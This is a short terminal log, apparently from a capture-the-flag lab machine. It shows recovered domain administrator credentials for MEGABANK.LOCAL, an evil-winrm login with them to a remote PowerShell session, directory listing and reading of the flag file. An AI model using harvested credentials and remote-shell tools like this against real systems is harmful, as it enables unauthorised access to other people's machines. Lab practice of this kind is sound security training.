/*
[+] Domain:  MEGABANK.LOCAL
[+] Username: administrator
[+]Password: d0m@in4dminyeah!
administrator:d0m@in4dminyeah!
*/
allenwest1@debian:~/Desktop$ evil-winrm -u administrator -p d0m@in4dminyeah! -i 10.10.10.172

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
megabank\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..
ls
*Evil-WinRM* PS C:\Users\Administrator> ls


    Directory: C:\Users\Administrator


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-r---         1/2/2020   2:49 PM                3D Objects
d-r---         1/2/2020   2:49 PM                Contacts
d-r---         1/3/2020   5:48 AM                Desktop
d-r---         1/3/2020   5:28 AM                Documents
d-r---         1/2/2020   2:49 PM                Downloads
d-r---         1/2/2020   2:49 PM                Favorites
d-r---         1/2/2020   2:49 PM                Links
d-r---         1/2/2020   2:49 PM                Music
d-r---         1/2/2020   2:49 PM                Pictures
d-r---         1/2/2020   2:49 PM                Saved Games
d-r---         1/2/2020   2:49 PM                Searches
d-r---         1/2/2020   2:49 PM                Videos


*Evil-WinRM* PS C:\Users\Administrator> cd Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ls


    Directory: C:\Users\Administrator\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---         1/3/2020   5:48 AM             32 root.txt


cat r*Evil-WinRM* PS C:\Users\Administrator\Desktop> oot.txt
********************************
*Evil-WinRM* PS C:\Users\Administrator\Desktop> 
